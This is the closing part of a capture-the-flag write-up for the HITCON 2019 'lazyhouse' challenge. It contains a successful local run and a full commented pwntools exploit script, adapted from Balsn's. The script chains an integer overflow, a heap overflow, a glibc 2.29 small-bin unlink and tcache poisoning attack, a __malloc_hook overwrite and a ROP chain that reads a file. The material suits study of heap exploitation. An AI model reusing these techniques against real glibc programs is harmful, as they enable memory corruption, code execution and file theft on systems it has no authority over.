NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
[*] '/ctf/CTF-archive/hitcon-2019/lazyhouse/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
LOCAL PROCESS
[+] Starting local process './lazyhouse': pid 3853
[*] Libc base: 0x7ff02a349000
[*] Heap base: 0x559a1966b000
[*] Switching to interactive mode
Price:5415557892635423262
hitconctf{congrats}\x00\x00\x00\x00\x00\x00\x00\x00
Full exploit script
My exploit script isn’t exactly Balsn’s exploit script. I modified it in some places, and also removed some stuff that wasn’t required for the exploit to function. Overall, I hope this writeup and the comments on the script help people understand how the exploit works, because it truly is amazing.
Big shoutout to Balsn for releasing the exploit script. I had lots of fun analysing it.
#!/usr/bin/env python2
from pwn import *
BINARY = './lazyhouse'
HOST, PORT = '3.115.121.123', 5731
elf = ELF('./lazyhouse')
libc = ELF('./libc.so.6')
def start():
if not args.REMOTE:
print "LOCAL PROCESS"
return process(BINARY)
else:
print "REMOTE PROCESS"
return remote(HOST, PORT)
def get_base_address(proc):
return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)
def debug(breakpoints):
script = "handle SIGALRM ignore\n"
PIE = get_base_address(p)
script += "set $_base = 0x{:x}\n".format(PIE)
for bp in breakpoints:
script += "b *0x%x\n"%(PIE+bp)
gdb.attach(p,gdbscript=script)
def buy(idx, size, content):
p.sendlineafter(': ', '1')
p.sendlineafter(':', str(idx))
p.sendlineafter(':', str(size))
p.sendafter(':', content)
def show(idx):
p.sendlineafter(': ', '2')
p.sendlineafter(':', str(idx))
def sell(idx):
p.sendlineafter(': ', '3')
p.sendlineafter(':', str(idx))
def upgrade(idx, content):
p.sendlineafter(': ', '4')
p.sendlineafter(':', str(idx))
p.sendafter(':', content)
def super_house(content):
p.sendlineafter(': ', '5')
p.sendafter(':', content)
context.arch = 'amd64'
context.terminal = ['tmux', 'new-window']
p = start()
if args.GDB:
debug([])
def get_money():
payload = ((2**64-1)/218)+1
p.sendlineafter(': ', '1')
p.sendlineafter(':', '0')
p.sendlineafter(':', str(payload))
sell(0)
get_money()
buy(0, 0x80, 'A'*0x80) # Used to overwrite into chunk B
buy(1, 0x500, 'B'*0x500) # Chunk B
buy(2, 0x80, 'C'*0x80) # Prevent consolidation with top chunk
# Sell chunk B into unsorted bin
sell(1)
buy(1, 0x600, 'A'*0x600) # Move chunk B to large bin
# Overflow to turn on the IS_MMAPPED bit of chunk B
# This prevents calloc from clearing the chunk when we reallocate it
upgrade(0, '\x00'*0x88 + p64(0x513))
# Get chunk B back without it being zeroed out
buy(7, 0x500, 'A'*8)
# Leak libc and heap addresses
show(7)
data = p.recv(0x18)
libc.address = u64(data[8:16]) - 0x1e50d0
heap = u64(data[16:24]) - 0x2e0
pop_rdi = libc.address + 0x26542
pop_rsi = libc.address + 0x26f9e
pop_rdx = libc.address + 0x12bda6
pop_rax = libc.address + 0x47cf8
syscall = libc.address + 0xcf6c5
malloc_hook = libc.symbols['__malloc_hook']
leave_ret = libc.address + 0x58373
log.info('Libc base: ' + hex(libc.address))
log.info('Heap base: ' + hex(heap))
# Clear indexes 0, 1, and 2
sell(0) # goes into tcache 0x80
sell(1) # merges with top chunk
sell(2) # goes into tcache 0x80
# Create a fake 0x230 sized chunk within a new chunk
# The target address is used to pass the unlink_chunk checks in libc 2.29
target = heap + 0x890
buy(6, 0x80, '\x00'*8 + p64(0x231)+p64(target+8)+p64(target+0x10)+p64(target))
# Create enough chunks to create a 0x230 sized gap between the fake 0x230 chunk above
# and the 0x600 sized chunk below that we will consolidate backwards
buy(5, 0x80, 'C'*0x80)
buy(0, 0x80, 'D'*0x80)
buy(1, 0x80, 'E'*0x80)
# This chunk will be freed to consolidate backwards
buy(2, 0x600, '\x00'*0x600)
# Set prev size to go back to the fake 0x230 chunk
# Clear prev inuse bit of the 0x600 sized chunk
upgrade(1, '\x00'*0x80 + p64(0x230) + p64(0x610))
# 0x600 chunk will now be freed and consolidated back to the fake 0x230 sized chunk
# Top chunk is right after this, so top chunk is consolidated all the way back too
sell(2)
# Index 5 will be the 0x6c1 sized fake chunk in the payload
# Index 0 will be the 0x31 sized chunk
# Index 1 will be the 0x21 sized chunk
payload = '\x00'*0x78 + p64(0x6c1) # Index 5
payload += p64(0)*17 + p64(0x31) # Index 0
payload += p64(0)*17 + p64(0x21) # Index 1
payload += p64(0)*15
buy(2, 0x500, payload)
# We put pointers to these chunks into the tcache_perthread_struct now
# This is required later when we do the small bin unlink attack
sell(0) # Free 0x30 sized chunk
sell(1) # Free 0x20 sized chunk
# Consolidate backwards again
# Any new allocations following this will allow us to overwrite the metadata of any
# of the chunks from above
sell(2)
# We create a chunk to go right up to the 0x20 sized chunk's fd and bk
# We must also maintain the 0x6c1 sized fake chunk here as we still have a pointer to it
# We will free the fake 0x6c1 chunk into the unsorted bin later
# It will be used to overwrite the metadata of the fake chunks from above
buy(0, 0x1a0, p64(0)*15+p64(0x6c1))
# This chunk will be right after the 0x20 sized chunk's fd and bk from above
# It will be sent into the small bin
# We will use it to perform a small bin unlink attack later
buy(1, 0x210, 'A'*0x210)
# Just a filler chunk for the next chunk
buy(2, 0x210, 'B'*0x210)
sell(2) # Send to tcache
# We need the fake 0xd1 chunk header here to be able to free the 0x6c1 chunk
# This can be calculated using gdb
buy(2, 0x210, '\x00'*0x148+p64(0xd1))
sell(2) # Send to tcache
# Fill the 0x210 tcache bin
for i in range(5):
buy(2, 0x210, 'a')
sell(2)
# We create a fake 0x100 chunk header in the tcache_perthread_struct
# by freeing this chunk
buy(2, 0x3a0, 'A'*0x3a0)
sell(2) # Send to tcache
# Send that initial 0x210 sized chunk into the small bin now
sell(1) # Send it to the unsorted bin
buy(1, 0x220, 'A'*0x210) # Move it to the small bin
sell(5) # Free the fake 0x6c1 sized chunk into unsorted bin
smallbin = libc.address + 0x1e4eb0
tcache_fake_chunk = heap+0x40 # Fake chunk in the tcache_perthread_struct
payload = '\x00'*0x98 + p64(0x31) # 0x30 sized chunk pointer points here
payload += p64(tcache_fake_chunk) # Overwrite the fd to heapbase+0x40
payload += '\x00'*0x80 + p64(0x221) # 0x30 sized chunk pointer points here
payload += p64(smallbin) + p64(tcache_fake_chunk) # Overwrite fd and bk, corrupt smallbin
buy(5, 0x6b0, payload)
# Put the flag's location string at a known place on the heap
# Using gdb, the flag's location string will be at heapbase+0xa68
payload = 'Z'*0x18
payload += '/home/vagrant/flag'.ljust(0x20, '\x00')
# ROP to open the flag file
# Flag file's file descriptor will be 3
payload += p64(pop_rdi) + p64(heap+0xa68)
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rax) + p64(2)
payload += p64(syscall)
# ROP to read the flag file's contents right into heapbase
payload += p64(pop_rdi) + p64(3)
payload += p64(pop_rsi) + p64(heap)
payload += p64(pop_rdx) + p64(0x100)
payload += p64(pop_rax) + p64(0)
payload += p64(syscall)
# ROP to write the contents of heapbase right into stdout
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi) + p64(heap)
payload += p64(pop_rdx) + p64(0x100)
payload += p64(pop_rax) + p64(1)
payload += p64(syscall)
buy(3, 0x210, payload)
# Overwrite the 0x210 sized chunk tcache bin with pointer to __malloc_hook
buy(2, 0x210, p64(0)*0x20 + p64(malloc_hook))
# Overwrite __malloc_hook with a leave; ret gadget
super_house(p64(leave_ret)) # __mpn_mul_n+83
# rbp is set to rsi before __malloc_hook is called in calloc
# Therefore we pass heap+0xa80 as an argument, as our ROP chain starts at
# heap+0xa88
buy(4, heap+0xa80, 'A')
p.interactive()